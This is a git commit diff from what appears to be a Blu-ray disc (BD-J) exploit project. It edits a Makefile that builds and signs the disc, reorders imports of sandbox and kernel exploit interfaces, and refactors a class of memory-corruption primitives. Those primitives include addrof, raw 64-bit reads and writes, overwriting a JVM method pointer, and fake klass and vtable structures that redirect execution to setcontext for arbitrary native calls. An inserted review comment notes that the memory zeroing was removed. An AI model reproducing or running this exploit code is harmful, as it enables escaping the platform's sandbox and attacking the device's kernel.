Clean up.

This commit is contained in:
Andy Nguyen 2021-11-04 23:29:24 +01:00
parent 9dcf0bfe7f
commit 8d7ad41156
3 changed files with 36 additions and 22 deletions


@ -28,7 +28,7 @@ CLASSES = \
JFLAGS = -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "$(LIB)/rt.jar:$(LIB)/bdjstack.jar" JFLAGS = -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "$(LIB)/rt.jar:$(LIB)/bdjstack.jar"
all: directory serialized classes jar bdmv all: directory serialized classes jar bdjo_bdmv
directory: directory:
mkdir -p $(BUILD) mkdir -p $(BUILD)
@ -47,7 +47,7 @@ jar:
cd $(BUILD) && jar cf ../$(DISC)/BDMV/JAR/00000.jar . && cd .. cd $(BUILD) && jar cf ../$(DISC)/BDMV/JAR/00000.jar . && cd ..
java -cp "$(TOOLS)/security.jar:$(TOOLS)/bcprov-jdk15-137.jar:$(TOOLS)/tools.jar" net.java.bd.tools.security.BDSigner $(DISC)/BDMV/JAR/00000.jar java -cp "$(TOOLS)/security.jar:$(TOOLS)/bcprov-jdk15-137.jar:$(TOOLS)/tools.jar" net.java.bd.tools.security.BDSigner $(DISC)/BDMV/JAR/00000.jar
bdmv: bdjo_bdmv:
java -jar $(TOOLS)/bdjo.jar $(BDMV)/bdjo.xml $(DISC)/BDMV/BDJO/00000.bdjo java -jar $(TOOLS)/bdjo.jar $(BDMV)/bdjo.xml $(DISC)/BDMV/BDJO/00000.bdjo
java -jar $(TOOLS)/MovieObject.jar $(BDMV)/MovieObject.xml $(DISC)/BDMV/MovieObject.bdmv java -jar $(TOOLS)/MovieObject.jar $(BDMV)/MovieObject.xml $(DISC)/BDMV/MovieObject.bdmv
java -jar $(TOOLS)/index.jar $(BDMV)/index.xml $(DISC)/BDMV/index.bdmv java -jar $(TOOLS)/index.jar $(BDMV)/index.xml $(DISC)/BDMV/index.bdmv


@ -81,6 +81,10 @@ public final class API {
private native long multiNewArray(long componentType, int[] dimensions); private native long multiNewArray(long componentType, int[] dimensions);
public boolean isJdk11() {
return jdk11;
}
private void init() throws Exception { private void init() throws Exception {
initUnsafe(); initUnsafe();
initDlsym(); initDlsym();
@ -112,6 +116,7 @@ public final class API {
} }
handleField = nativeLibraryClass.getDeclaredField(HANDLE_FIELD_NAME); handleField = nativeLibraryClass.getDeclaredField(HANDLE_FIELD_NAME);
findMethod.setAccessible(true); findMethod.setAccessible(true);
handleField.setAccessible(true); handleField.setAccessible(true);
@ -174,6 +179,7 @@ public final class API {
long apiInstance = addrof(this); long apiInstance = addrof(this);
long apiKlass = read64(apiInstance + 0x08); long apiKlass = read64(apiInstance + 0x08);
boolean installed = false;
if (jdk11) { if (jdk11) {
long methods = read64(apiKlass + 0x170); long methods = read64(apiKlass + 0x170);
int numMethods = read32(methods + 0x00); int numMethods = read32(methods + 0x00);
@ -194,7 +200,8 @@ public final class API {
if (name.equals(MULTI_NEW_ARRAY_METHOD_NAME) if (name.equals(MULTI_NEW_ARRAY_METHOD_NAME)
&& signature.equals(MULTI_NEW_ARRAY_METHOD_SIGNATURE)) { && signature.equals(MULTI_NEW_ARRAY_METHOD_SIGNATURE)) {
write64(method + 0x50, Java_java_lang_reflect_Array_multiNewArray); write64(method + 0x50, Java_java_lang_reflect_Array_multiNewArray);
return; installed = true;
break;
} }
} }
} else { } else {
@ -217,14 +224,26 @@ public final class API {
if (name.equals(MULTI_NEW_ARRAY_METHOD_NAME) if (name.equals(MULTI_NEW_ARRAY_METHOD_NAME)
&& signature.equals(MULTI_NEW_ARRAY_METHOD_SIGNATURE)) { && signature.equals(MULTI_NEW_ARRAY_METHOD_SIGNATURE)) {
write64(method + 0x78, Java_java_lang_reflect_Array_multiNewArray); write64(method + 0x78, Java_java_lang_reflect_Array_multiNewArray);
return; installed = true;
break;
} }
} }
} }
if (!installed) {
throw new IllegalStateException("Could not install native method."); throw new IllegalStateException("Could not install native method.");
} }
// Invoke call method many times to kick in optimization.
train();
}
private void train() {
for (int i = 0; i < 10000; i++) {
call(0);
}
}
private void buildContext( private void buildContext(
long contextBuf, long contextBuf,
long jmpBuf, long jmpBuf,
@ -262,12 +281,6 @@ public final class API {
write64(contextBuf + 0x118, 0); write64(contextBuf + 0x118, 0);
} }
public void train() {
for (int i = 0; i < 10000; i++) {
call(0);
}
}
public long call(long func, long arg0, long arg1, long arg2, long arg3, long arg4, long arg5) { public long call(long func, long arg0, long arg1, long arg2, long arg3, long arg4, long arg5) {
long fakeClassOop = malloc(INT64_SIZE); long fakeClassOop = malloc(INT64_SIZE);
long fakeClass = malloc(0x100); long fakeClass = malloc(0x100);
@ -278,11 +291,6 @@ public final class API {
throw new IllegalStateException("Could not allocate memory."); throw new IllegalStateException("Could not allocate memory.");
} }
write64(fakeClassOop, 0);
memset(fakeClass, 0, 0x100);
memset(fakeKlass, 0, 0x200);
memset(fakeKlassVtable, 0, 0x400);
try { try {
long ret = 0; long ret = 0;
@ -306,11 +314,14 @@ public final class API {
} else { } else {
write64(fakeKlassVtable + 0x158, __Ux86_64_setcontext); // multi_allocate write64(fakeKlassVtable + 0x158, __Ux86_64_setcontext); // multi_allocate
} }
ret = multiNewArray(fakeClassOop, MULTI_NEW_ARRAY_DIMENSIONS); ret = multiNewArray(fakeClassOop, MULTI_NEW_ARRAY_DIMENSIONS);
if (i == 0) {
buildContext( buildContext(
fakeKlass + 0x00, fakeKlass + 0x00, func, arg0, arg1, arg2, arg3, arg4, arg5); fakeKlass + 0x00, fakeKlass + 0x00, func, arg0, arg1, arg2, arg3, arg4, arg5);
} }
}
} else { } else {
write64(fakeClassOop + 0x00, fakeClass); write64(fakeClassOop + 0x00, fakeClass);
write64(fakeClass + 0x68, fakeKlass); write64(fakeClass + 0x68, fakeKlass);
@ -326,12 +337,15 @@ public final class API {
} else { } else {
write64(fakeKlassVtable + 0x230, __Ux86_64_setcontext); // multi_allocate write64(fakeKlassVtable + 0x230, __Ux86_64_setcontext); // multi_allocate
} }
ret = multiNewArray(fakeClassOop, MULTI_NEW_ARRAY_DIMENSIONS); ret = multiNewArray(fakeClassOop, MULTI_NEW_ARRAY_DIMENSIONS);
if (i == 0) {
buildContext( buildContext(
fakeKlass + 0x20, fakeKlass + 0x20, func, arg0, arg1, arg2, arg3, arg4, arg5); fakeKlass + 0x20, fakeKlass + 0x20, func, arg0, arg1, arg2, arg3, arg4, arg5);
} }
} }
}
if (ret == 0) { if (ret == 0) {
return 0; return 0;
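Review bot: `call` no longer zero-fills fakeClass, fakeKlass and fakeKlassVtable after they are allocated (the hunk at @ -278,11 drops the `write64(fakeClassOop, 0)` and the three `memset` calls), so any slot that the redirected multiNewArray reads and that is not covered by an explicit `write64` now holds whatever the heap previously contained. If the allocator is known to return zeroed memory, or every dereferenced offset is written before use, a one-line comment at the allocation site should record that; otherwise the zeroing should come back, since an unwritten slot makes failures nondeterministic and hard to diagnose. The `malloc` calls and the enclosing loop over `i` are outside the visible hunks, so this is inferred from the removed lines only. The new `isJdk11()` and the now-private `train()` also lack Javadoc; something like `/** Exercises {@link #call} repeatedly so the runtime optimizes the call path before it is relied on. */` on train() would capture what the inline comment hints at.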


@ -7,11 +7,11 @@
package com.bdjb; package com.bdjb;
import com.bdjb.exploit.sandbox.ExploitSandboxInterface; import com.bdjb.exploit.kernel.ExploitKernelInterface;
import com.bdjb.exploit.sandbox.ExploitDefaultImpl; import com.bdjb.exploit.sandbox.ExploitDefaultImpl;
import com.bdjb.exploit.sandbox.ExploitUserPrefsImpl; import com.bdjb.exploit.sandbox.ExploitUserPrefsImpl;
import com.bdjb.exploit.sandbox.ExploitSandboxInterface;
import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl; import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl;
import com.bdjb.exploit.kernel.ExploitKernelInterface;
import java.io.FileOutputStream; import java.io.FileOutputStream;
import java.io.InputStream; import java.io.InputStream;
import java.io.OutputStream; import java.io.OutputStream;